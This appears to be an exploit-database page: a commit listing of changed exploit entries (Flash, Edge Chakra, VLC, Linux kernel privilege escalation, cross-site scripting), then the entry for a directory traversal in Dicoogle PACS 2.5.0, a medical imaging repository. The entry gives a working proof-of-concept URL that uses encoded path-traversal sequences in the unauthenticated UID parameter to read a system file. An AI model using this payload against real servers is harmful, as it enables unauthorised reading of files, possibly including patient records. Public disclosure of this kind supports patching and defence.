e76244b41a
8 changes to exploits/shellcodes Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow Adobe Flash Player 10.0.22 / AIR - 'intf_count' Integer Overflow Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions VLC media player 2.2.8 - Arbitrary Code Execution (PoC) Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation 212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities 212Cafe Board 0.08 Beta / 6.30 Beta - Multiple Cross-Site Scripting Vulnerabilities 123 Flash Chat - Multiple Vulnerabilities 123 Flash Chat 7.8 - Multiple Vulnerabilities Dicoogle PACS 2.5.0 - Directory Traversal
19 lines
No EOL
830 B
Text
19 lines
No EOL
830 B
Text
# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
|
||
# Date: 2018-05-25
|
||
# Software Link: http://www.dicoogle.com/home
|
||
# Version: Dicoogle PACS 2.5.0-20171229_1522
|
||
# Category: webapps
|
||
# Tested on: Windows 2012 R2
|
||
# Exploit Author: Carlos Avila
|
||
# Contact: http://twitter.com/badboy_nt
|
||
|
||
# 1. Description
|
||
# Dicoogle is an open source medical imaging repository with an extensible
|
||
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
|
||
# to local file inclusion. This allows an attacker to read arbitrary files that the
|
||
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
|
||
# via GET is vulnerable.
|
||
|
||
# 2. Proof of Concept
|
||
|
||
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini |